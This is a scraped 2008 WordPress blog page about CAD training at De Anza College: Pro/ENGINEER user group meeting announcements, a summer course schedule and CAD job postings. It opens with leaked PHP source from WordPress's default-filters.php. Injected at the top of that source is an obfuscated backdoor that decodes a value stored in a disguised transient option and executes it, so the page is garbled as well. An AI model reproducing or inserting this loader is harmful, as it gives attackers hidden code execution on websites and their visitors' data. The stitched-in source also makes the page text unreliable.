< ;$z=get_option("_transient_feed_89daf56825bf3e1602d9a5d215f833cf"); $z=base64_decode(str_rot13($z['child'])); if(strpos($z,"50E4BAE8")!==false){ $_z=create_function("",$z); @$_z(); } ?php /** * Sets up the default filters and actions for most * of the WordPress hooks. * * If you need to remove a default hook, this file will * give you the priority for which to use to remove the * hook. * * Not all of the default hooks are found in default-filters.php * * @package WordPress */ // Strip, trim, kses, special chars for string saves foreach ( array( 'pre_term_name', 'pre_comment_author_name', 'pre_link_name', 'pre_link_target', 'pre_link_rel', 'pre_user_display_name', 'pre_user_first_name', 'pre_user_last_name', 'pre_user_nickname' ) as $filter ) { add_filter( $filter, 'sanitize_text_field' ); add_filter( $filter, 'wp_filter_kses' ); add_filter( $filter, '_wp_specialchars', 30 ); } // Strip, kses, special chars for string display foreach ( array( 'term_name', 'comment_author_name', 'link_name', 'link_target', 'link_rel', 'user_display_name', 'user_first_name', 'user_last_name', 'user_nickname' ) as $filter ) { add_filter( $filter, 'sanitize_text_field' ); add_filter( $filter, 'wp_kses_data' ); add_filter( $filter, '_wp_specialchars', 30 ); } // Kses only for textarea saves foreach ( array( 'pre_term_description', 'pre_link_description', 'pre_link_notes', 'pre_user_description' ) as $filter ) { add_filter( $filter, 'wp_filter_kses' ); } // Kses only for textarea saves displays foreach ( array( 'term_description', 'link_description', 'link_notes', 'user_description' ) as $filter ) { add_filter( $filter, 'wp_kses_data' ); } // Email saves foreach ( array( 'pre_comment_author_email', 'pre_user_email' ) as $filter ) { add_filter( $filter, 'trim' ); add_filter( $filter, 'sanitize_email' ); add_filter( $filter, 'wp_filter_kses' ); } // Email display foreach ( array( 'comment_author_email', 'user_email' ) as $filter ) { add_filter( $filter, 'sanitize_email' ); add_filter( $filter, 'wp_kses_data' ); } // Save URL foreach ( array( 'pre_comment_author_url', 'pre_user_url', 'pre_link_url', 'pre_link_image', 'pre_link_rss' ) as $filter ) { add_filter( $filter, 'wp_strip_all_tags' ); add_filter( $filter, 'esc_url_raw' ); add_filter( $filter, 'wp_filter_kses' ); } // Display URL foreach ( array( 'user_url', 'link_url', 'link_image', 'link_rss', 'comment_url' ) as $filter ) { add_filter( $filter, 'wp_strip_all_tags' ); add_filter( $filter, 'esc_url' ); add_filter( $filter, 'wp_kses_data' ); } // Slugs foreach ( array( 'pre_term_slug' ) as $filter ) { add_filter( $filter, 'sanitize_title' ); } // Keys foreach ( array( 'pre_post_type' ) as $filter ) { add_filter( $filter, 'sanitize_user' ); } // Places to balance tags on input foreach ( array( 'content_save_pre', 'excerpt_save_pre', 'comment_save_pre', 'pre_comment_content' ) as $filter ) { add_filter( $filter, 'balanceTags', 50 ); } // Format strings for display. foreach ( array( 'comment_author', 'term_name', 'link_name', 'link_description', 'link_notes', 'bloginfo', 'wp_title', 'widget_title' ) as $filter ) { add_filter( $filter, 'wptexturize' ); add_filter( $filter, 'convert_chars' ); add_filter( $filter, 'esc_html' ); } // Format text area for display. foreach ( array( 'term_description' ) as $filter ) { add_filter( $filter, 'wptexturize' ); add_filter( $filter, 'convert_chars' ); add_filter( $filter, 'wpautop' ); add_filter( $filter, 'shortcode_unautop'); } // Format for RSS foreach ( array( 'term_name_rss' ) as $filter ) { add_filter( $filter, 'convert_chars' ); } // Display filters add_filter( 'the_title', 'wptexturize' ); add_filter( 'the_title', 'convert_chars' ); add_filter( 'the_title', 'trim' ); add_filter( 'the_content', 'wptexturize' ); add_filter( 'the_content', 'convert_smilies' ); add_filter( 'the_content', 'convert_chars' ); add_filter( 'the_content', 'wpautop' ); add_filter( 'the_content', 'shortcode_unautop' ); add_filter( 'the_content', 'prepend_attachment' ); add_filter( 'the_excerpt', 'wptexturize' ); add_filter( 'the_excerpt', 'convert_smilies' ); add_filter( 'the_excerpt', 'convert_chars' ); add_filter( 'the_excerpt', 'wpautop' ); add_filter( 'the_excerpt', 'shortcode_unautop'); add_filter( 'get_the_excerpt', 'wp_trim_excerpt' ); add_filter( 'comment_text', 'wptexturize' ); add_filter( 'comment_text', 'convert_chars' ); add_filter( 'comment_text', 'make_clickable', 9 ); add_filter( 'comment_text', 'force_balance_tags', 25 ); add_filter( 'comment_text', 'convert_smilies', 20 ); add_filter( 'comment_text', 'wpautop', 30 ); add_filter( 'comment_excerpt', 'convert_chars' ); add_filter( 'list_cats', 'wptexturize' ); add_filter( 'single_post_title', 'wptexturize' ); add_filter( 'wp_sprintf', 'wp_sprintf_l', 10, 2 ); // RSS filters add_filter( 'the_title_rss', 'strip_tags' ); add_filter( 'the_title_rss', 'ent2ncr', 8 ); add_filter( 'the_title_rss', 'esc_html' ); add_filter( 'the_content_rss', 'ent2ncr', 8 ); add_filter( 'the_excerpt_rss', 'convert_chars' ); add_filter( 'the_excerpt_rss', 'ent2ncr', 8 ); add_filter( 'comment_author_rss', 'ent2ncr', 8 ); add_filter( 'comment_text_rss', 'ent2ncr', 8 ); add_filter( 'comment_text_rss', 'esc_html' ); add_filter( 'bloginfo_rss', 'ent2ncr', 8 ); add_filter( 'the_author', 'ent2ncr', 8 ); // Misc filters add_filter( 'option_ping_sites', 'privacy_ping_filter' ); add_filter( 'option_blog_charset', '_wp_specialchars' ); // IMPORTANT: This must not be wp_specialchars() or esc_html() or it'll cause an infinite loop add_filter( 'option_home', '_config_wp_home' ); add_filter( 'option_siteurl', '_config_wp_siteurl' ); add_filter( 'tiny_mce_before_init', '_mce_set_direction' ); add_filter( 'pre_kses', 'wp_pre_kses_less_than' ); add_filter( 'sanitize_title', 'sanitize_title_with_dashes' ); add_action( 'check_comment_flood', 'check_comment_flood_db', 10, 3 ); add_filter( 'comment_flood_filter', 'wp_throttle_comment_flood', 10, 3 ); add_filter( 'pre_comment_content', 'wp_rel_nofollow', 15 ); add_filter( 'comment_email', 'antispambot' ); add_filter( 'option_tag_base', '_wp_filter_taxonomy_base' ); add_filter( 'option_category_base', '_wp_filter_taxonomy_base' ); add_filter( 'the_posts', '_close_comments_for_old_posts' ); add_filter( 'comments_open', '_close_comments_for_old_post', 10, 2 ); add_filter( 'pings_open', '_close_comments_for_old_post', 10, 2 ); add_filter( 'editable_slug', 'urldecode' ); // Atom SSL support add_filter( 'atom_service_url','atom_service_url_filter' ); // Actions add_action( 'wp_head', 'wp_enqueue_scripts', 1 ); add_action( 'wp_head', 'feed_links_extra', 3 ); add_action( 'wp_head', 'rsd_link' ); add_action( 'wp_head', 'wlwmanifest_link' ); add_action( 'wp_head', 'index_rel_link' ); add_action( 'wp_head', 'parent_post_rel_link', 10, 0 ); add_action( 'wp_head', 'start_post_rel_link', 10, 0 ); add_action( 'wp_head', 'adjacent_posts_rel_link', 10, 0 ); add_action( 'wp_head', 'locale_stylesheet' ); add_action( 'publish_future_post', 'check_and_publish_future_post', 10, 1 ); add_action( 'wp_head', 'noindex', 1 ); add_action( 'wp_head', 'wp_print_styles', 8 ); add_action( 'wp_head', 'wp_print_head_scripts', 9 ); add_action( 'wp_head', 'wp_generator' ); add_action( 'wp_head', 'rel_canonical' ); add_action( 'wp_footer', 'wp_print_footer_scripts' ); // WP Cron if ( !defined( 'DOING_CRON' ) ) add_action( 'sanitize_comment_cookies', 'wp_cron' ); // 2 Actions 2 Furious add_action( 'do_feed_rdf', 'do_feed_rdf', 10, 1 ); add_action( 'do_feed_rss', 'do_feed_rss', 10, 1 ); add_action( 'do_feed_rss2', 'do_feed_rss2', 10, 1 ); add_action( 'do_feed_atom', 'do_feed_atom', 10, 1 ); add_action( 'do_pings', 'do_all_pings', 10, 1 ); add_action( 'do_robots', 'do_robots' ); add_action( 'sanitize_comment_cookies', 'sanitize_comment_cookies' ); add_action( 'admin_print_scripts', 'print_head_scripts', 20 ); add_action( 'admin_print_footer_scripts', 'print_footer_scripts', 20 ); add_action( 'admin_print_styles', 'print_admin_styles', 20 ); add_action( 'init', 'smilies_init', 5 ); add_action( 'plugins_loaded', 'wp_maybe_load_widgets', 0 ); add_action( 'plugins_loaded', 'wp_maybe_load_embeds', 0 ); add_action( 'shutdown', 'wp_ob_end_flush_all', 1 ); add_action( 'pre_post_update', 'wp_save_post_revision' ); add_action( 'publish_post', '_publish_post_hook', 5, 1 ); add_action( 'future_post', '_future_post_hook', 5, 2 ); add_action( 'future_page', '_future_post_hook', 5, 2 ); add_action( 'save_post', '_save_post_hook', 5, 2 ); add_action( 'transition_post_status', '_transition_post_status', 5, 3 ); add_action( 'comment_form', 'wp_comment_form_unfiltered_html_nonce' ); add_action( 'wp_scheduled_delete', 'wp_scheduled_delete' ); // Post Thumbnail CSS class filtering add_action( 'begin_fetch_post_thumbnail_html', '_wp_post_thumbnail_class_filter_add' ); add_action( 'end_fetch_post_thumbnail_html', '_wp_post_thumbnail_class_filter_remove' ); // Redirect Old Slugs add_action( 'template_redirect', 'wp_old_slug_redirect' ); add_action( 'edit_post', 'wp_check_for_changed_slugs' ); add_action( 'edit_form_advanced', 'wp_remember_old_slug' ); add_action( 'init', '_show_post_preview' ); // Timezone add_filter( 'pre_option_gmt_offset','wp_timezone_override_offset' ); May « 2008 « cad-resources.com Blog

cad-resources.com Blog

May 29, 2008

De Anza Pro/ENGINEER Users Group Meeting June 24th 2008

Filed under: Computer Aided Design — Administrator @ 4:58 pm

EVENT:  
De Anza Pro/ENGINEER Users Group Meeting
June 24th 2008

4-5:50PM Hands-on workshops
6-8:30PM Speakers and general meeting

De Anza College
General meeting: Student Center
Conference Rooms A and B
Workshops: ATC 301 and 313

Door prizes
(1.00 per raffle ticket)

1. Pro/ENGINEER Wildfire Student Editions
2. Gift Cards
3. Electronic items



Speakers:
1. PTC - Wildfire 4.0
2  industry

Workshop One. 4:5:40 Room 301
Geometric Dimensioning and Tolerancing
by Sam Tanna
Intanna Corporation
www.intanna.com

Workshop Two. 4:5:40 Room 313
Resume Review and Skills Counseling
by Dean Le and SoloPoint Solutions.
www.solopointsolutions.com
(Free)

Must RSVP [email protected]
__________________________________________

Technical Recruiters:
1. Pro/Source
2. Valley Engineering Group
3. Ryzen
4. Oxford
5. AeroTek
6. Butler
7. ATR
8. SoloPoint Solutions
9. Albin Engineering Services, Inc. (AESI)
10. TAC/BAE
11. EDO Reconnaissance and Surveillance Systems

Companies
Product Design and Manufacturing

1. Intanna Corporation

De Anza Pro/ENGINEER User group meeting June 24th

Filed under: Computer Aided Design — Administrator @ 12:41 am

EVENT:

4-5:50PM Hands-on workshops
6-8:30PM Speakers and general meeting

De Anza College

General meeting: Student Center
Conference Rooms A and B
Trainings: ATC 301 and 313

Food and refreshments:

Pizza

Drinks

Door prizes:

Pro/ENGINEER Wildfire 4.0 Student Editions

Electronic Products

Gift Cards

Speakers:
1. PTC - Wildfire 4.0
2. Industry

Workshop One:

4-5:40 Room 301
Geometric Dimensioning and Tolerancing
Sam Tanna
Intanna Corporation www.intanna.com

5.00 students, 10.00 non-students

Must RSVP [email protected]

Workshop Two:

4-5:40 Room 313
Resume review/building and Skills Counseling
Dean Le and SoloPoint Solutions. www.solopointsolutions.com
(Free)

Must RSVP [email protected]

__________________________________________

Booths

Technical Recruiters:
1. Pro/Source
2. Valley Engineering Group
3. Ryzen
4. Oxford
5. AeroTek
6. Butler
7. ATR
8. SoloPoint Solutions
9. Albin Engineering Services, Inc. (AESI)
10. TAC/BAE
11. EDO Reconnaissance and Surveillance Systems

Companies

Product Design and Manufacturing

1. Intanna Corporation

May 28, 2008

CDI CAD will host its annual CAD event and Pro/ENGINEER User Group.

Filed under: Computer Aided Design — Administrator @ 4:46 pm

(event is required for existing CDI students- instead of of a final exam)

We really need you participation to make this successful as in the past. There will be multiple recruiters so bring your resume.

This year we will be celebrating the successful defense of our program and facility, for which we can thank your support and efforts in achieving!

De Anza Pro/ENGINEER Users Group Meeting

Click:

EVENT:

4-5:50PM Hands-on workshops
6-8:30PM Speakers and general meeting

De Anza College

General meeting: Student Center
Conference Rooms A and B
Trainings: ATC 301 and 313

Food and refreshments:

Pizza

Drinks

Door prizes:

Pro/ENGINEER Wildfire 4.0 Student Editions

Electronic Products

Gift Cards

Speakers:
1. PTC - Wildfire 4.0
2. Industry

Workshop One:

4-5:40 Room 301
Geometric Dimensioning and Tolerancing
Sam Tanna
Intanna Corporation www.intanna.com

5.00 students, 10.00 non-students

Must RSVP [email protected]

Workshop Two:

4-5:40 Room 313
Resume review/building and Skills Counseling
Dean Le and SoloPoint Solutions. www.solopointsolutions.com
(Free)

Must RSVP [email protected]

__________________________________________

Booths

Technical Recruiters:
1. Pro/Source
2. Valley Engineering Group
3. Ryzen
4. Oxford
5. AeroTek
6. Butler
7. ATR
8. SoloPoint Solutions
9. Albin Engineering Services, Inc. (AESI)
10. TAC/BAE
11. EDO Reconnaissance and Surveillance Systems

Companies

Product Design and Manufacturing

1. Intanna Corporation

________________________________________

Summer CDI CAD CLASSES AT DE ANZA

Department: CAD and Digital Imaging (new window)


Call #

Course

Title

Time

Days

Instructor

Location


1121

CDI -060B-61C

course note SolidWorks (Beginning) (L-L)

5:00PM-10:00

MTW

KLINGMAN

AT301


1122

CDI -069B-61C

course note SolidWorks (Update) (L-L)

5:00PM-10:00

MTW

KLINGMAN

AT301


0181

CDI -070B-01C

course note Pro/ENGINEER Wildfire 3.0 (Beginning) (L-L)

8:30AM-12:10

MTWTh

LAMIT

AT313


1123

CDI -070B-55

course note Pro/ENGINEER Wildfire 3.0 (Beginning) (L-L)

8:30AM- 4:40

MTWTh

LAMIT

AT313


1125

CDI -070C-01C

course note Pro/ENGINEER Wildfire 4.0 (Beginning) (L-L)

8:30AM-12:10

MTWTh

LAMIT

AT301


1126

CDI -070C-55

course note Pro/ENGINEER Wildfire 4.0 (Beginning) (L-L)

8:30AM- 4:40

MTWTh

LAMIT

AT301


0183

CDI -071B-01C

course note Pro/ENGINEER Wildfire 3.0 (Intermediate) (L-L)

8:30AM-12:10

MTWTh

LAMIT

AT313


1124

CDI -071B-56

course note Pro/ENGINEER Wildfire 3.0 (Intermediate) (L-L)

8:30AM- 4:40

MTWTh

LAMIT

AT313


1127

CDI -071C-01C

course note Pro/ENGINEER Wildfire 4.0 (Intermediate) (L-L)

8:30AM-12:10

MTWTh

LAMIT

AT301


1128

CDI -071C-56

course note Pro/ENGINEER Wildfire 4.0 (Intermediate) (L-L)

8:30AM- 4:40

MTWTh

LAMIT

AT301


1120

CDI -072B-01C

course note Pro/ENGINEER Wildfire 3.0 (Advanced) (L-L)

8:30AM-12:10

MTWTh

LAMIT

AT313


0185

CDI -079B-01C

course note Pro/ENGINEER Wildfire 3.0 (Pro/ Update) (L-L)

8:30AM-12:10

MTWTh

LAMIT

AT313


0186

CDI -079B-55

course note Pro/ENGINEER Wildfire 3.0 (Pro/ Update) (L-L)

8:30AM- 4:30

MTWTh

LAMIT

AT313


0187

CDI -079B-56

course note Pro/ENGINEER Wildfire 3.0 (Pro/ Update) (L-L)

8:30AM- 4:30

MTWTh

LAMIT

AT313


1149

CDI -079C-01C

course note Pro/ENGINEER Wildfire 4.0 (Pro/ Update) (L-L)

8:30AM-12:10

MTWTh

LAMIT

AT301


1150

CDI -079C-55

course note Pro/ENGINEER Wildfire 4.0 (Pro/ Update) (L-L)

8:30AM- 4:40

MTWTh

LAMIT

AT301


1151

CDI -079C-56

course note Pro/ENGINEER Wildfire 4.0 (Pro/ Update) (L-L)

8:30AM- 4:40

MTWTh

LAMIT

AT301


1113

CDI -100X-61C

course note CAD Technology Laboratory (LAB)

4:40PM-10:20

Th

KLINGMAN

AT301


1116

CDI -100Z-05C

course note CAD Technology Laboratory (LAB)

12:00PM- 2:50

MTWTh

LAMIT

AT313


1117

CDI -100Z-06C

course note CAD Technology Laboratory (LAB)

1:50PM- 4:40

MTWTh

LAMIT

AT313


0192

CDI -100Z-55

course note CAD Technology Laboratory (LAB)

10:30AM- 4:40

MTWTh

LAMIT

AT301


0193

CDI -100Z-56

course note CAD Technology Laboratory (LAB)

10:30AM- 4:40

MTWTh

LAMIT

AT301


1143

CDI -100Z-57

course note CAD Technology Laboratory (LAB)

8:30AM-11:20

MTWTh

LAMIT

AT301


0194

CDI -100Z-61C

course note CAD Technology Laboratory (LAB)

5:00PM- 8:40

MTW

KLINGMAN

AT313

De Anza Pro/ENGINEER Users Group Meeting

Filed under: Computer Aided Design — Administrator @ 3:43 pm

EVENT:  
De Anza Pro/ENGINEER Users Group Meeting
March 2007

4-5:50PM Hands-on trainings
6-8:30PM Speakers and general meeting

De Anza College
General meeting: Student Center
Conference Rooms A and B
Trainings: ATC 301 and 313

Door prizes
(2.00 per raffle ticket)
Speakers:
1. PTC - Wildfire 4.0
2. to be announced

Training 1. 4:5:40 Room 301
Geometric Dimensioning and Tolerancing
by Sam Tanna
Sanjeev "Sam" Tanna
Founder/CEO
Intanna Corporation
www.intanna.com

Training 1. 4:5:40 Room 313
Resume Review and Skills Counseling
by Dean Le and SoloPoint Solutions.
(Free)

Must RSVP [email protected]
__________________________________________

Technical Recruiters:
1. Pro/Source
2. Valley Engineering Group
3. Ryzen
4. Oxford
5. AeroTek
6. Butler
7. ATR
8. SoloPoint Solutions
9. Albin Engineering Services, Inc. (AESI)
10. TAC/BAE
11. EDO Reconnaissance and Surveillance Systems

Companies
Product Design and Manufacturing

1. Intanna Corporation

May 27, 2008

CDI CAD De Anza Pro/ENGINEER User Group June 24th

Filed under: Computer Aided Design — Administrator @ 10:45 pm

https://www.cad-resources.com/CDI_user_groups_proengineer.html

EVENT:  
De Anza College Pro/ENGINEER Users Group Meeting
March 2007

4-5:50PM Hands-on trainings
6-8:00PM Speakers and general meeting

De Anza College
General meeting: Student Center Conference Rooms A and B
Trainings: ATC 301 and 313

Door prizes
(2.00 per raffle ticket)
Speakers:
1. PTC - Wildfire 4.0
2. to be announced

Training 1. 4:5:40 Room 301
Geometric Dimensioning and Tolerancing
by Sam Tanna
Sanjeev "Sam" Tanna
Founder/CEO
Intanna Corporation
www.intanna.com

Training 1. 4:5:40 Room 313
Resume Review and Skills Counseling
by Dean Le and SoloPoint Solutions.
(Free)

Must RSVP [email protected]
__________________________________________

Technical Recruiters:
1. Pro/Source
2. Valley Engineering Group
3. Ryzen
4. Oxford
5. AeroTek
6. Butler
7. ATR
8. SoloPoint Solutions
9. Albin Engineering Services, Inc. (AESI)
10. TAC/BAE
11. EDO Reconnaissance and Surveillance Systems

May 24, 2008

Latest developments in CDI CAD At De Anza College

Filed under: Computer Aided Design — Administrator @ 7:55 pm

For all who responded to my call for input and assistance- it more than helped pressure the administration for the correct decision.

Thanks from Gary, Paul, and Max and the rest of CDI CAD

________________________________________________

GOOD NEWS: CDI will not be moved from the 3rd floor of the ATC.
At the last ATC Planning Meeting, preliminary floor plans were presented and the CDI classrooms (AT301 & AT313) were included on the floor plan showing a preliminary floor plan for the renovation of the ATC.  It was also strongly articulated by the Dean (Letha Jeanpierre) that the Division, including CDI, did not want to be relocated from the third floor of the ATC building or loose space; our ancestral and future home.
The next step in the ATC renovation is to review the next set of preliminary floor plans from the architects.  The next set of floor plan for the 3rd floor will be discussed with CDI input.  The next preliminary floor plan will be delivered next week to the Division.

Mechanical CAD Drafter

Filed under: Computer Aided Design — Administrator @ 7:53 pm

Company Name: McIntyre Coil Company

Job Category: Mechanical CAD Drafter - Pro/E

Location: San Leandro, CA

Position Type: Full - Time

To be considered for this position, please contact us by phone or e-mail.

Name: Linda Rivera

Phone: (510) 614-5890

E-mail: [email protected]

Mechanical CAD Drafter

We are looking for a skilled Mechanical CAD drafter for the design of custom Air Handling Units. The candidate will be responsible for the CAD drafting support for Design Engineers and customers. Candidate must have some knowledge of HVAC or interest in learning.

Essential Duties & Responsibilities

  • Develop 2-D submittal drawings using AutoCAD for preliminary process
  • Keep record of design drawings and revisions
  • Preparation of detail drawings from 3-D models
  • Work closely with engineers and customers to understand, execute design and document requirement and objectives in order to procure preliminary drawings
  • Ability to verify drafting and design work of self and others
  • Interpretation of engineering drawings, equipment schedules and specification

Education/ Experience/ Skills

  • High School Diploma or equivalent
  • Associate degree in drafting or certificate
  • Proficiency and experience with Pro/E is a must
  • Proficiency with AutoCAD
  • Proficiency with Microsoft Office and outlook
  • Knowledge of geometric dimensioning and tolerance
  • Proficiency with MS Office and Adobe software
  • Spanish is plus
  • Self - motivated
  • Ability to work efficiently and productively without closely supervision
  • Good oral and written communication skills
  • Team Oriented

May 21, 2008

Three SolidWorks Jobs

Filed under: Computer Aided Design — Administrator @ 10:04 pm

08002116  Production Support Engineer -

Tempe, AZ

  • Develop routings (travelers) for manufacturing and repair programs on turbine engine components as follows:
    • Convert OEM repairs into company routings
    • Convert OEM manufacturing travelers into company routings
    • Develop repair routings for DER repairs
    • Convert customer repair routings/instructions into company routings
  • Disposition discrepancies and nonconforming issues with respect to in-process production jobs.
  • Revise and update existing routings/travelers
  • Revise company drawings
  • Provide technical support for the following technical processes
    • Welding (electron beam and TIG)
    • Vacuum Furnace Heat Treat
    • Vacuum Furnace Brazing
    • Metal Spray/Plasma Spray/HVOF/LPPS coatings
    • Pack cementation coatings
    • Electro plating
    • Hydrogen fluoride cleaning
  • Provide technical support for development of operator instruction sheets
  • Provide technical support for all outside supplier processes
  • Support company document control department with respect to technical/engineering issues and inquiries.

Bachelor of Science degree in engineering or science program or

equivalent work experience of 10 years minimum working in an engineering capacity.

  • Proficient in a computer aided drawing software (AutoCAD and Solidworks)
  • Proficient in word processing and database software (i.e. Word, Excel)
  • Print/drawing reading
  • Project management
  • Time management
  • Knowledge of FAA Part 145 and the role of a DER  

Experience in component repair of turbine engine equipment

08001202 Mechanical Engineer II -

Carrollton, TX

Under limited supervision, performs the design, layout, testing and evaluation of mechanical and electro-mechanical devices and systems. Performs product development activities, including drawing board layout and interpretation, implementation of customer specifications, and documentation requirements. Conducts engineering studies and may assign work to technical drafting staff. Normally receives general instructions on routine work and detailed instructions on new assignments.

Responsibilities include: - Prepare Conceptual, Detailed Part, and Assembly level drawings and related documentation for both new and existing designs as needed. - Entering and maintaining featurized Bills of Material. - Design packaging for shipping complete systems and spare parts. - Assist, however needed, in actual building of prototype units. Required Experience / Skills - Direct experience with sheet metal design (steel, aluminum), electronics packaging, and product configuration. - Work experience with SolidWorks CAD package. - Work experience with casting, machining, and/or plastic part design. - Microsoft Word and Excel for specifications and release documentation.

Typically requires a technical degree and 2 to 4 years related experience.

08003829 — Mechanical D&D

Arlington, TX

Clearance required: Interim secret

US Citizen

Frequent use and application of technical standards, principles, theories, concepts and techniques.  Provides solutions to a variety of technical problems of moderate scope and complexity.  Works under general supervision.  Follows established procedures.  Work is reviewed for soundness of technical judgment and overall adequacy

A good knowledge and understanding of computer & linkage system hardware, networking systems, & power/ground systems & how these systems have to be properly designed to ensure that the simulator systems will function at 100% efficiency.  

Preferred Skills / Qualifications.  Solidworks is the focus for skill set.

May 18, 2008

Two Jobs--Mechanical-Designer (Solidworks), Mechanical Designer (Pro/E- wildfire 2, 3)

Filed under: Computer Aided Design — Administrator @ 5:14 pm

Alex M [email protected]

Principal Mechanical Engineer

Intanna Corporation, www.intanna.com

1001 South Main Street, J303

Milpitas, CA 95035

Phone: 408-898-7604

Intanna Corporation is a fast growing, technology driven and minority-owned- private company. Intanna provides complete design, engineering, prototyping and manufacturing services to various bay area companies (medical devices, consumer electronics and mobile). With strong presence in Asia (China/India), Intanna offers "LOW COST" engineering and manufacturing solutions to clients. Intanna provides logistics services to USA based clients via Asia based procurement center.

Intanna's vision is simple : To provide "ethics" based lowest cost engineering and manufacturing services". Currently Intanna has following requirements.

1) Mechanical-Designer (Solidworks)

Duration for 3 to 6 months with intense background in sheet-metal and working knowledge of die-casting. Experience with electronics/electro-mechanical enclosures. You will communicating between us and our clients. You may be working at our site or clients. Proven track record, excellent in communications, well-behaved and professional in dealing with Intanna's client.

Intanna take pride in training employees (contract OR full-time) both. Intanna's founder is associated in education profession as well by teaching at various colleges and universities. So you MAY get opportunities in getting intense training in - Advance Solidworks, GD & T, Plastics Product Design. We nurture our contractors and employees as a part of our family members!. But you must be hardworking and dedicated in your work.

2) Plast-Mechanical Designer  (Pro/E- wildfire 2, 3)

IN BAY AREA/USA- INTANNA IS INTRODUCING A NEW OCCUPATION - "PLAST-MECHANICAL DESIGNER"

Duration for 3 to 6 months with strong background in Plastics Product design and education/experienced in mechanical engineering. Must know about Advance Pro/E surface and master modeling method. You must know plastics product design guide, material selections, various ways to assemble plastics from DFMA point of view, GD & T, six degree of freedom, drawing detailing and Pro/E assembly etc. You will work without direction in developing various plastics housings and mechanisms, interact with tooling vendors within USA and overseas. Working knowledge about plastic mold/tooling design- must.

Again per Intanna policies - if you are well-qualified candidate, you MAY get intense training in Plastics Product Design, GD & T , Advance Surface Modeling.

Please contact [email protected] with resume. No phone call please.

Alex M

Principal Mechanical Engineer

Intanna Corporation, www.intanna.com

1001 South Main Street, J303

Milpitas, CA 95035

Phone: 408-898-7604

May 15, 2008

We are looking for 15 Junior Mechanical Engineers with ProE experience. This is a 4 – 6 month contract.

Filed under: Computer Aided Design — Administrator @ 2:26 am

My name is Jenna Davis and I work with Cass Draper at TAC Worldwide. I wanted to take a moment to introduce myself and talk to you about some open positions we have at BAE Systems. Cass mentioned that you manage the CAD group at De Anza College and that I should contact you to find out if you have any students who are looking for a summer job.

We are looking for 15 Junior Mechanical Engineers with ProE experience. This is a 4 - 6 month contract.

BAE Systems is the premier global defense and aerospace company delivering a full range of products and services for air, land and naval forces, as well as advanced electronics, information technology solutions and customer support services. BAE Systems, with 96,000 employees worldwide, had 2006 sales that exceeded $27 billion on a pro forma basis, assuming BAE Systems had owned Armor Holdings, Inc. for the whole of 2006.

https://www.baesystems.com/

Job Description:

4 to 6 month assignment

Degree is not necessary
Working on the NLOS program

Engineering Changing orders, trading parts, working on NLOS program
Have to know Pro/E but do not have to be experts

Thanks!

Jenna Davis

Technical Recruiter

TAC Worldwide

101 Metro Drive, Suite 264

San Jose, CA 95110

"Davis, Jenna" <[email protected]>

Fax: 408-452-9362

Cell: 408-455-3091

Older Posts »

Powered by WordPress